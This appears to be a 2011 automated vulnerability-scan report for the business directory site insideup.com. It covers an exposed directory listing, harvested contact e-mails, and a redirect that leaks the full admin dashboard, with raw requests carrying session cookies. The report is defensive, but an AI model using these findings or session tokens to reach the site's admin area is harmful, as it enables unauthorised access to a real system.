<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /css</title> </head> <body><h1>Index of /css</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Copy%20of%20mainInsidUp.css">Copy of mainInsidUp.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right"> 56K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Dyn_form_style.css">Dyn_form_style.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">1.6K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="calendar.css">calendar.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">2.3K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="dhtmlwindow.css">dhtmlwindow.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">1.1K</td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="fb/">fb/</a></td><td align="right">18-Apr-2011 13:34 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="grid.css">grid.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">945 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="jquery.collapsedtree.css">jquery.collapsedtree.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">390 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="jquery.expandedtree.css">jquery.expandedtree.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">378 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="mainInsidUp.css">mainInsidUp.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">125K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="mainNewInsideup.css">mainNewInsideup.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right"> 40K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="newlanding_style.css">newlanding_style.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">2.4K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="newstyle.css">newstyle.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right"> 18K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="reset.css">reset.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">648 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="style.css">style.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right"> 31K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="styleWiki.css">styleWiki.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">5.7K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="styles.css">styles.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">2.1K</td></tr><tr><th colspan="5"><hr></th></tr></table><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 443</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /privacy.html

/privacy.html

http://www.insideup.com/privacy.html

Found E-mails

  • privacy@insideup.com
  • support@insideup.com

Request

GET /privacy.html HTTP/1.1
Referer: http://www.insideup.com/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, questionnaire, matching, privacy"/> <meta name="description" content="Your information is safe with us"/> <meta name="robots" content="index; follow"/> <title>Private Policy of InsideUp</title> <link rel="stylesheet" type="text/css" href="css/mainInsidUp.css" /> <link rel="stylesheet" type="text/css" href="css/calendar.css" /> <script type="text/javascript" src="js/jquery-1.2.1.js"></script> <script type="text/javascript" src="js/ajax.js"></script> <script type="text/javascript" src="js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="js/default.js"></script> <script type="text/javascript" src="js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainHomeBlock"> <!--Header Start's Here--> <div id="header" class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Privacy Policy',0,'')" alt="About Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="mainMidContainer"> <!--midsection part starts--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="css/mainInsidUp.css" /><script src="js/default.js" type="text/javascript"></script><div id="mainHomeBlock"> <!--Mid Container Start's Here--> <div> <div id="rateAVenUpperDiv" class="greenTilteBig" >Privacy Policy</div> <div id="privacyMidSec" style="text-align:left;"> <div style="width: 550px;float: left;"> <p> <b>InsideUp</b> wants to earn your trust by telling you exactly how we collect and use information about you. We also want you to have control over your personal data. This document describes our privacy policy and includes some useful links to websites where you can learn more about protecting your privacy. </p> <div class="quesRtSubTxt">Our Privacy Policy</div> <p> At <b>InsideUp</b>, we are creating a dynamic online community where you can search for business services, review vendor ratings, and get candid and honest feedback on vendor services. Registered members ("members") can rate vendors, provide references, and answer questions from other members. To insure accuracy, we allow business vendors to flag ratings and references that may not come from actual customers. We also don't release or sell member information, so our members' privacy is protected. </p> <div id="privacyHeading" class="quesRtSubTxt">Privacy Commitment</div> <p> To protect your privacy, <b>InsideUp</b> has instituted a number of policies that give you information and control: </p> <ul> <div id="privacyUlLi"> <li>We provide a link to this privacy statement on all pages that ask for personal information</li> <li>We will not store or release personal identifying information about you without first obtaining your consent</li> <li>We will not knowingly collect or use personal identifying information from children younger than 13</li> </div> </ul> </div> <div style="width:267px; height:235px; background:url(images/Gray.png) no-repeat; background-color#EEEEEE ;float: right;margin-top: 10px; "> <table width="250" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="80" align="center" class="YellBoxTxt16"><br /></td> </tr> <tr> <td height="65" align="center" valign="top" class="YellBoxTxt18"><a href="https://www.bbb.org/online/consumer/cks.aspx?id=109060517022" target="_blank"><img src="images/AccreditedBusinessImg.png" alt="ACCREDITED BUSINESS" border="0" /></a></td> </tr> <tr> <td align="center"> </td> </tr> </table> </div> <div style="clear: both;"></div> <p> This privacy statement discloses our practices for the gathering and use of information from visitors to our own websites and from people who register for services that we offer online. </p> <div id="privacyHeading" class="quesRtSubTxt">Your Acceptance</div> <p> By using our sites, you signify your agreement to the privacy polices described above. If you do not agree with our privacy policies, please do not use our site(s) ("sites"). If we make any substantial changes to the way we use your personal information, we will notify you by posting a prominent announcement on our pages or we will email you if you are a member. </p> <div id="privacyHeading" class="quesRtSubTxt">Questions</div> <p> If you have any questions about this privacy statement, our online practices, or your dealings with our websites, you can contact us at: </p> <div> InsideUp.<br /> 8895 Town Center Drive, Suite 105<br /> San Diego, CA 92122 USA<br /> e-mail: <a href="mailto:privacy@insideup.com">privacy (at) insideup.com </a> </div><br /> <div id="privacyHeading" class="quesRtSubTxt">Personal Information</div> <div><b>What Type of Personal Information Do We Collect and Use?</b></div> <p> If you contact us by email, complete our registration forms, surveys, or entry forms, register for our community services, subscribe to our newsletters, or participate in one of our contests or sweepstakes, we will ask you for certain information. The information we ask for may include the following: </p> <p> <ul> <div id="privacyUlLi"> <li>Your Name</li> <li>Your Email Address</li> <li>Your Age</li> <li>Company Name</li> <li>Company Address</li> <li>Company Telephone Number</li> <li>Company Mailing Address</li> <li>Company Zip Code</li> <li>Company Email Address</li> <li>Company Webs..
Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /ppc/tools/

/ppc/tools/ CONFIRMED

http://www.insideup.com/ppc/tools/

Request

GET /ppc/tools/ HTTP/1.1
Referer: http://www.insideup.com/ppc/tools/images/newlanding_insideuplogo.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; OAID=98176d5cda925cc255264f2e6b81597a; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2228%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A51%3A%22http%3A%2F%2Fwww.insideup.com%2Fcompetitivecomparision.html%22%3B%7D; PHPSESSID=bevcehsdjrij0b7vbkc95loq47; OAVARS[ad01cc48]=DEFAULT; sessionID=0b2d5f8e1658958c3530cfa0d175799a
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Wed, 20 Apr 2011 02:17:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
location: /admin/adminhome.html?accessdenied=true
Content-Length: 7578
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>InsideUp Admin Tool</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="css/default.css" rel="stylesheet" type="text/css" /> <link href="css/mainnewnnsideup.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="js/jquery-1.js"></script> <script type="text/javascript" src="js/default.js"></script></head><body><table border="0" cellspacing='0' cellpadding='1' align='center' width="100%" class="maintable"> <tr> <td colspan="2" valign="top" height="490"> <div id="wrapper"> <div id="header"> <div id="logo"> <img src="images/insideup-logo.jpg" alt="InsidUp" /><br /> Business Management System </div> <div id="headerRight"> <div id="loginLogot"> Welcom <a href="/admin/logout.html">[Logout]</a> <a href="/admin/adminhome.html">[Admin Home]</a> </div> <div id="topmenu"> <div class="header"> <ul id="headerNav" class="headerNav headerContentActive"> <li class="headerHome"> <a href="http://www.insideup.com/admin/adminusers.html" onmouseover="toggleHeader(0,'headerHomeActive')" onmouseout="toggleHeader(1,'headerContentActive')">---------</a> </li> <li class="headerAdvertise"> <a href="http://www.insideup.com/admin/showAdvertiser.html" onmouseover="toggleHeader(0, 'headerAdvertiseActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerAffiliate"> <a href="http://www.insideup.com/admin/partners.html" onmouseover="toggleHeader(0,'headerAffiliateActive')" onmouseout="toggleHeader(1,'headerContentActive')">---------</a> </li> <li class="headerCategory"> <a href="http://www.insideup.com/admin/showSubCategoryDetail.html" onmouseover="toggleHeader(0, 'headerCategoryActive')" onmouseout="toggleHeader(1,'headerContentActive')">---------</a> </li> <li class="headerContent"> <a href="http://www.insideup.com/ppc/tools/index.php" onmouseover="toggleHeader(0, 'headerContentActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerCredit"> <a href="http://www.insideup.com/admin/showRefund.html" onmouseover="toggleHeader(0, 'headerCreditActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerDirectry"> <a href="http://www.insideup.com/admin/showYahooData.html" onmouseover="toggleHeader(0, 'headerDirectryActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerFunding"> <a href="http://www.insideup.com/admin/showFundDetail.html" onmouseover="toggleHeader(0, 'headerFundingActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerLeads"> <a href="http://www.insideup.com/admin/showLead.html?index=5&subCategoryId=-1&optionId=-1&attributeId=-1" onmouseover="toggleHeader(0, 'headerLeadsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerOrders"> <a href="http://www.insideup.com/admin/leadOrders.html?viewType=orders" onmouseover="toggleHeader(0, 'headerOrdersActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerPartners"> <a href="http://www.insideup.com/admin/showAffilates.html" onmouseover="toggleHeader(0, 'headerPartnersActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerRefund"> <a href="http://www.insideup.com/admin/refundrequest.html" onmouseover="toggleHeader(0, 'headerRefundActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerReports"> <a href="http://www.insideup.com/admin/reports.html" onmouseover="toggleHeader(0, 'headerReportsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerReps"> <a href="http://www.insideup.com/admin/showSalesRepresentative.html" onmouseover="toggleHeader(0, 'headerRepsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerTools"> <a href="http://www.insideup.com/admin/adminUpload.html" onmouseover="toggleHeader(0, 'headerToolsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerUsers"> <a href="http://www.insideup.com/admin/serviceseekers.html" onmouseover="toggleHeader(0, 'headerUsersActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> </ul> </div> </div> </div> </div> <div id="contentWrapper"> <div class="ContentTopMenu"> <a href="template_index.php">Templates</a> | <a href="pages_index.php">Lead Flow</a> | <a href="select_vendor_index.php">Select Vendor</a> </div> <!-- Content Section Start --> <div id="contentBox"> <img src="images/contenttop.jpg" alt="" style="display:block;" /> <!--Text content start here--> <div id="contentMatter"> <table cellspacing="0" cellpadding="5" border="0" width="100%" class="mainTable"> <tbody> <tr> <td align="left" width="39%" valign="middle" class="lineTwo">Total Group</td> <td align="right" width="61%" valign="middle" class="lineTwo">946</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Total Templates</td> <td align="right" valign="middle" class="lineOne">5</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">Total Categories</td> <td align="right" valign="middle" class="lineTwo">68</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Two Page Lead Flows</td> <td align="right" valign="middle" class="lineOne">0</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">One Page Lead Flows</td> <td align="right" valign="middle" class="lineTwo">0</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Dynamic Lead Flows</td> <td align="right" valign="middle" class="lineOne">959</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">Video Lead Flows</td> <td align="right" valign="middle" class="lineTwo">6</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">Mobile Lead Flows</td> <td align="right" valign="middle" class="lineTwo">6</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Select Vendor</td> <td align="right" valign="middle" class="lineOne">8</td> </tr> </tbody> </table> </div> <!--Text content start here--> <img src="images/contentbottam.jpg" alt="" style="display:block;" /> </div> </div> </td> </tr> <tr> <td colspan="2" align="center">Copyright 2011 InsideUp, Inc. All Rights Reserved.</td> </tr> </table></body></html>